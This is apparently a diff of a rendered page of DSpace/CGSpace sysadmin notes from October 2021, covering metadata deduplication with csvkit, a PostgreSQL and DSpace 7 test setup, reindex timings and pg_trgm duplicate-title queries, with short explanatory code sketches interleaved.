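# Hypothetical sample data standing in for the exported community CSV
sample = io.StringIO("id,dc.title[en_US]\na1,First\nb2,Second\na1,First\n")
total, unique = count_ids(sample)
print(f"{total} rows, {unique} unique ids, {total - unique} repeated")
```

Because `csv.DictReader` handles the header itself, the count does not depend on where the header line ends up after sorting.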
                                                                                                                                                                                                                                                                                                • It seems there are only about 200 duplicate values in this subset of fields in ILRI’s community:
                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                $ grep -c 'Removing duplicate value' /tmp/out.log
                                                                                                                                                                                                                                                                                                -220
                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                  $ grep -c 'Removing duplicate value' /tmp/out.log
                                                                                                                                                                                                                                                                                                  +220
                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                  • I found a cool way to select only the items with corrections
                                                                                                                                                                                                                                                                                                    • First, extract a handful of fields from the CSV with csvcut
                                                                                                                                                                                                                                                                                                    • @@ -376,14 +376,14 @@ $ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed
                                                                                                                                                                                                                                                                                                      $ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' /tmp/ilri.csv | csvsort | uniq > /tmp/ilri-deduplicated-items.csv
                                                                                                                                                                                                                                                                                                      -$ csv-metadata-quality -i /tmp/ilri-deduplicated-items.csv -o /tmp/ilri-deduplicated-items-cleaned.csv | tee /tmp/out.log
                                                                                                                                                                                                                                                                                                      -$ sed -i -e '1s/en_US/en_Fu/g' /tmp/ilri-deduplicated-items-cleaned.csv
                                                                                                                                                                                                                                                                                                      -$ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cleaned.csv > /tmp/ilri-deduplicated-items-cleaned-joined.csv
                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                        $ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' /tmp/ilri.csv | csvsort | uniq > /tmp/ilri-deduplicated-items.csv
                                                                                                                                                                                                                                                                                                        +$ csv-metadata-quality -i /tmp/ilri-deduplicated-items.csv -o /tmp/ilri-deduplicated-items-cleaned.csv | tee /tmp/out.log
                                                                                                                                                                                                                                                                                                        +$ sed -i -e '1s/en_US/en_Fu/g' /tmp/ilri-deduplicated-items-cleaned.csv
                                                                                                                                                                                                                                                                                                        +$ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cleaned.csv > /tmp/ilri-deduplicated-items-cleaned-joined.csv
                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                        • Then I imported the file into OpenRefine and used a custom text facet with a GREL like this to identify the rows with changes:
                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                        if(cells['dcterms.subject[en_US]'].value == cells['dcterms.subject[en_Fu]'].value,"same","different")
                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                        if(cells['dcterms.subject[en_US]'].value == cells['dcterms.subject[en_Fu]'].value,"same","different")
                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                        • For these rows I starred them and then blanked out the original field so DSpace would see it as a removal, and add the new column
                                                                                                                                                                                                                                                                                                            @@ -392,9 +392,9 @@ $ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cl
                                                                                                                                                                                                                                                                                                          • I did the same for CIAT but there were over 7,000 duplicate metadata values! Hard to believe:
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                          $ grep -c 'Removing duplicate value' /tmp/out.log
                                                                                                                                                                                                                                                                                                          -7720
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                            $ grep -c 'Removing duplicate value' /tmp/out.log
                                                                                                                                                                                                                                                                                                            +7720
                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                            • I applied these to the CIAT community, so in total that’s over 8,000 duplicate metadata values removed in a handful of fields…

                                                                                                                                                                                                                                                                                                            2021-10-09

                                                                                                                                                                                                                                                                                                            @@ -402,14 +402,14 @@ $ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cl
                                                                                                                                                                                                                                                                                                          • I did similar metadata cleanups for CCAFS and IITA too, but there were only a few hundred duplicates there
                                                                                                                                                                                                                                                                                                          • Also of note, there are some other fixes too, for example in IITA’s community:
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                          $ grep -c -E '(Fixing|Removing) (duplicate|excessive|invalid)' /tmp/out.log
                                                                                                                                                                                                                                                                                                          -249
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                            $ grep -c -E '(Fixing|Removing) (duplicate|excessive|invalid)' /tmp/out.log
                                                                                                                                                                                                                                                                                                            +249
                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                            • I ran a full Discovery re-indexing on CGSpace
                                                                                                                                                                                                                                                                                                            • Then I exported all of CGSpace and extracted the ISSNs and ISBNs:
                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                            $ csvcut -c 'id,cg.issn[en_US],dc.identifier.issn[en_US],cg.isbn[en_US],dc.identifier.isbn[en_US]' /tmp/cgspace.csv > /tmp/cgspace-issn-isbn.csv
                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                              $ csvcut -c 'id,cg.issn[en_US],dc.identifier.issn[en_US],cg.isbn[en_US],dc.identifier.isbn[en_US]' /tmp/cgspace.csv > /tmp/cgspace-issn-isbn.csv
                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                              • I did cleanups on about seventy items with invalid and mixed ISSNs/ISBNs
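A minimal sketch of how ISSN values could be screened before a manual cleanup like this one, assuming the standard ISSN check-digit rule (weights 8 down to 2 over the first seven digits, modulo 11, with X standing for 10). The function name `issn_is_valid` is hypothetical and is not part of csvkit or DSpace, and this is not necessarily how the items above were identified.

```shell
# Hypothetical helper: return 0 if $1 is an ISSN with a correct check digit.
# Accepts the value with or without the hyphen and with a lowercase "x".
issn_is_valid() {
  # Normalize: drop the hyphen and uppercase a trailing x
  issn=$(printf '%s' "$1" | tr -d '-' | tr 'x' 'X')

  # Must be seven digits followed by a digit or X
  printf '%s\n' "$issn" | grep -Eq '^[0-9]{7}[0-9X]$' || return 1

  # Weighted sum of the first seven digits, weights 8, 7, ..., 2
  sum=0
  i=0
  while [ "$i" -lt 7 ]; do
    digit=$(printf '%s' "$issn" | cut -c "$((i + 1))")
    sum=$((sum + digit * (8 - i)))
    i=$((i + 1))
  done

  # Expected check character: (11 - sum mod 11) mod 11, where 10 is written as X
  check=$(( (11 - sum % 11) % 11 ))
  if [ "$check" -eq 10 ]; then
    check=X
  fi

  [ "$(printf '%s' "$issn" | cut -c 8)" = "$check" ]
}
```

For example, `issn_is_valid 0378-5955 && echo valid` prints `valid`, while `issn_is_valid 0378-5954` returns a non-zero status. Multi-value cells would need to be split on the separator used in the export before calling the function.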

                                                                                                                                                                                                                                                                                                              2021-10-10

                                                                                                                                                                                                                                                                                                              @@ -417,42 +417,42 @@ $ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cl
                                                                                                                                                                                                                                                                                                            • Start testing DSpace 7.1-SNAPSHOT to see if it has the duplicate item bug on metadata-export (DS-4211)
                                                                                                                                                                                                                                                                                                            • First create a new PostgreSQL 13 container:
                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                            $ podman run --name dspacedb13 -v dspacedb13_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5433:5432 -d postgres:13-alpine
                                                                                                                                                                                                                                                                                                            -$ createuser -h localhost -p 5433 -U postgres --pwprompt dspacetest
                                                                                                                                                                                                                                                                                                            -$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
                                                                                                                                                                                                                                                                                                            -$ psql -h localhost -p 5433 -U postgres dspace7 -c 'CREATE EXTENSION pgcrypto;'
                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                              $ podman run --name dspacedb13 -v dspacedb13_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5433:5432 -d postgres:13-alpine
                                                                                                                                                                                                                                                                                                              +$ createuser -h localhost -p 5433 -U postgres --pwprompt dspacetest
                                                                                                                                                                                                                                                                                                              +$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
                                                                                                                                                                                                                                                                                                              +$ psql -h localhost -p 5433 -U postgres dspace7 -c 'CREATE EXTENSION pgcrypto;'
                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                              • Then edit setting in dspace/config/local.cfg and build the backend server with Java 11:
                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                              $ mvn package
                                                                                                                                                                                                                                                                                                              -$ cd dspace/target/dspace-installer
                                                                                                                                                                                                                                                                                                              -$ ant fresh_install
                                                                                                                                                                                                                                                                                                              -# fix database not being fully ready, causing Tomcat to fail to start the server application
                                                                                                                                                                                                                                                                                                              -$ ~/dspace7/bin/dspace database migrate
                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                $ mvn package
                                                                                                                                                                                                                                                                                                                +$ cd dspace/target/dspace-installer
                                                                                                                                                                                                                                                                                                                +$ ant fresh_install
                                                                                                                                                                                                                                                                                                                +# fix database not being fully ready, causing Tomcat to fail to start the server application
                                                                                                                                                                                                                                                                                                                +$ ~/dspace7/bin/dspace database migrate
                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                • Copy Solr configs and start Solr:
                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                $ cp -Rv ~/dspace7/solr/* ~/src/solr-8.8.2/server/solr/configsets
                                                                                                                                                                                                                                                                                                                -$ ~/src/solr-8.8.2/bin/solr start
                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                  $ cp -Rv ~/dspace7/solr/* ~/src/solr-8.8.2/server/solr/configsets
                                                                                                                                                                                                                                                                                                                  +$ ~/src/solr-8.8.2/bin/solr start
                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                  • Start my local Tomcat 9 instance:
                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                  $ systemctl --user start tomcat9@dspace7
                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                    $ systemctl --user start tomcat9@dspace7
                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                    • This works, so now I will drop the default database and import a dump from CGSpace
                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                    $ systemctl --user stop tomcat9@dspace7                                
                                                                                                                                                                                                                                                                                                                    -$ dropdb -h localhost -p 5433 -U postgres dspace7
                                                                                                                                                                                                                                                                                                                    -$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
                                                                                                                                                                                                                                                                                                                    -$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest superuser;'
                                                                                                                                                                                                                                                                                                                    -$ pg_restore -h localhost -p 5433 -U postgres -d dspace7 -O --role=dspacetest -h localhost dspace-2021-10-09.backup
                                                                                                                                                                                                                                                                                                                    -$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest nosuperuser;'
                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                      $ systemctl --user stop tomcat9@dspace7                                
                                                                                                                                                                                                                                                                                                                      +$ dropdb -h localhost -p 5433 -U postgres dspace7
                                                                                                                                                                                                                                                                                                                      +$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
                                                                                                                                                                                                                                                                                                                      +$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest superuser;'
                                                                                                                                                                                                                                                                                                                      +$ pg_restore -h localhost -p 5433 -U postgres -d dspace7 -O --role=dspacetest -h localhost dspace-2021-10-09.backup
                                                                                                                                                                                                                                                                                                                      +$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest nosuperuser;'
                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                      • Delete Atmire migrations and some others that were “unresolved”:
                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                      $ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';"
                                                                                                                                                                                                                                                                                                                      -$ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');"
                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                        $ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';"
                                                                                                                                                                                                                                                                                                                        +$ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');"
                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                        • Now DSpace 7 starts with my CGSpace data… nice
                                                                                                                                                                                                                                                                                                                          • The Discovery indexing still takes seven hours… fuck
                                                                                                                                                                                                                                                                                                                          • @@ -469,11 +469,11 @@ $ psql -h localhost -p 5433 -U postgres dspac
                                                                                                                                                                                                                                                                                                                            • Start a full Discovery reindex on my local DSpace 6.3 instance:
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            $ /usr/bin/time -f %M:%e chrt -b 0 ~/dspace63/bin/dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                            -Loading @mire database changes for module MQM
                                                                                                                                                                                                                                                                                                                            -Changes have been processed
                                                                                                                                                                                                                                                                                                                            -836140:6543.6
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              $ /usr/bin/time -f %M:%e chrt -b 0 ~/dspace63/bin/dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                              +Loading @mire database changes for module MQM
                                                                                                                                                                                                                                                                                                                              +Changes have been processed
                                                                                                                                                                                                                                                                                                                              +836140:6543.6
                                                                                                                                                                                                                                                                                                                              +
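As a reading aid for the last line of the output above: with GNU `time`, `%M` is the maximum resident set size in kilobytes and `%e` is the elapsed wall-clock time in seconds. The following is a minimal sketch of the conversion; the helper name `parse_time_output` is hypothetical and not part of any tool used in these notes.

```python
def parse_time_output(line: str) -> tuple[float, float]:
    """Split a '%M:%e' line from GNU time into (peak RSS in MiB, elapsed hours)."""
    max_rss_kb, elapsed_s = line.strip().split(":")
    # %M is reported in kilobytes, %e in seconds
    return int(max_rss_kb) / 1024, float(elapsed_s) / 3600


rss_mib, hours = parse_time_output("836140:6543.6")
print(f"peak memory: {rss_mib:.0f} MiB, elapsed: {hours:.1f} hours")
```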
                                                                                                                                                                                                                                                                                                                              • So that’s 1.8 hours versus 7 on DSpace 7, with the same database!
                                                                                                                                                                                                                                                                                                                              • Several users wrote to me that CGSpace was slow recently
                                                                                                                                                                                                                                                                                                                                  @@ -481,13 +481,13 @@ Changes have been processed
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              $ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
                                                                                                                                                                                                                                                                                                                              -53
                                                                                                                                                                                                                                                                                                                              -$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
                                                                                                                                                                                                                                                                                                                              -1697
                                                                                                                                                                                                                                                                                                                              -$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceWeb'" | wc -l
                                                                                                                                                                                                                                                                                                                              -1681
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                $ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
                                                                                                                                                                                                                                                                                                                                +53
                                                                                                                                                                                                                                                                                                                                +$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
                                                                                                                                                                                                                                                                                                                                +1697
                                                                                                                                                                                                                                                                                                                                +$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceWeb'" | wc -l
                                                                                                                                                                                                                                                                                                                                +1681
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                • Looking at Munin, I see there are indeed a higher number of locks starting on the morning of 2021-10-07:

                                                                                                                                                                                                                                                                                                                                PostgreSQL locks week

                                                                                                                                                                                                                                                                                                                                @@ -516,71 +516,71 @@ $ psql -c "SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            localhost/dspace= > SET pg_trgm.similarity_threshold = 0.5;
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              localhost/dspace= > SET pg_trgm.similarity_threshold = 0.5;
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              • Next I experimented with using GIN or GiST indexes on metadatavalue, but they were slower than the existing DSpace indexes
                                                                                                                                                                                                                                                                                                                                • I tested a few variations of the query I had been using and found it’s much faster if I use the similarity operator and keep the condition that object IDs are in the item table…
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
                                                                                                                                                                                                                                                                                                                              -                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                              -────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                              - Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                              -(1 row)
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              -Time: 739.948 ms
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
                                                                                                                                                                                                                                                                                                                                +                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                +────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                + Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                +(1 row)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +Time: 739.948 ms
                                                                                                                                                                                                                                                                                                                                +
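For context on what the `%` operator in the query above compares: pg_trgm scores two strings by the overlap of their three-character sequences and checks that score against `pg_trgm.similarity_threshold`. The following is a rough sketch of that scoring in Python, assuming ASCII-only text (PostgreSQL's notion of a word character depends on the locale); the function names are illustrative and this is not the extension's actual code.

```python
import re


def trigrams(text: str) -> set[str]:
    """Return the set of trigrams, approximately as pg_trgm extracts them."""
    result: set[str] = set()
    # Lowercase the text and treat anything non-alphanumeric as a word separator
    for word in re.findall(r"[a-z0-9]+", text.lower()):
        padded = f"  {word} "  # each word gets two leading spaces and one trailing space
        result.update(padded[i:i + 3] for i in range(len(padded) - 2))
    return result


def similarity(a: str, b: str) -> float:
    """Shared trigrams divided by all distinct trigrams of both strings."""
    ta, tb = trigrams(a), trigrams(b)
    if not ta or not tb:
        return 0.0
    return len(ta & tb) / len(ta | tb)


title = "Traditional knowledge affects soil management ability of smallholder farmers in marginal areas"
print(similarity(title, title.lower()))
print(similarity(title, "Traditional knowledge and soil management in marginal areas"))
```

An identical title (ignoring case) scores 1.0, so it passes any threshold, while a partial match may or may not pass depending on the value set with `SET pg_trgm.similarity_threshold`.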
                                                                                                                                                                                                                                                                                                                                • Now this script runs in four minutes (versus twenty-four!) and it still finds the same seven duplicates! Amazing!
                                                                                                                                                                                                                                                                                                                                • I still don’t understand the differences in the query plan well enough, but I see it is using the DSpace default indexes and the results are accurate
                                                                                                                                                                                                                                                                                                                                • So to summarize, the best to the worst query, all returning the same result:
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
                                                                                                                                                                                                                                                                                                                                -                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                -────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                - Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                -(1 row)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -Time: 683.165 ms
                                                                                                                                                                                                                                                                                                                                -Time: 635.364 ms
                                                                                                                                                                                                                                                                                                                                -Time: 674.666 ms
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > DISCARD ALL;
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
                                                                                                                                                                                                                                                                                                                                -                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                -────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                - Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                -(1 row)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -Time: 1584.765 ms (00:01.585)
                                                                                                                                                                                                                                                                                                                                -Time: 1665.594 ms (00:01.666)
                                                                                                                                                                                                                                                                                                                                -Time: 1623.726 ms (00:01.624)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > DISCARD ALL;
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
                                                                                                                                                                                                                                                                                                                                -                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                -────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                - Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                -(1 row)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -Time: 4028.939 ms (00:04.029)
                                                                                                                                                                                                                                                                                                                                -Time: 4022.239 ms (00:04.022)
                                                                                                                                                                                                                                                                                                                                -Time: 4061.820 ms (00:04.062)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > DISCARD ALL;
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
                                                                                                                                                                                                                                                                                                                                -                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                -────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                - Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                -(1 row)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -Time: 4358.713 ms (00:04.359)
                                                                                                                                                                                                                                                                                                                                -Time: 4301.248 ms (00:04.301)
                                                                                                                                                                                                                                                                                                                                -Time: 4417.909 ms (00:04.418)
                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                2021-10-13

                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
                                                                                                                                                                                                                                                                                                                                +                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                +────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                + Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                +(1 row)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +Time: 683.165 ms
                                                                                                                                                                                                                                                                                                                                +Time: 635.364 ms
                                                                                                                                                                                                                                                                                                                                +Time: 674.666 ms
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > DISCARD ALL;
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
                                                                                                                                                                                                                                                                                                                                +                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                +────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                + Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                +(1 row)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +Time: 1584.765 ms (00:01.585)
                                                                                                                                                                                                                                                                                                                                +Time: 1665.594 ms (00:01.666)
                                                                                                                                                                                                                                                                                                                                +Time: 1623.726 ms (00:01.624)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > DISCARD ALL;
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
                                                                                                                                                                                                                                                                                                                                +                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                +────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                + Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                +(1 row)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +Time: 4028.939 ms (00:04.029)
                                                                                                                                                                                                                                                                                                                                +Time: 4022.239 ms (00:04.022)
                                                                                                                                                                                                                                                                                                                                +Time: 4061.820 ms (00:04.062)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > DISCARD ALL;
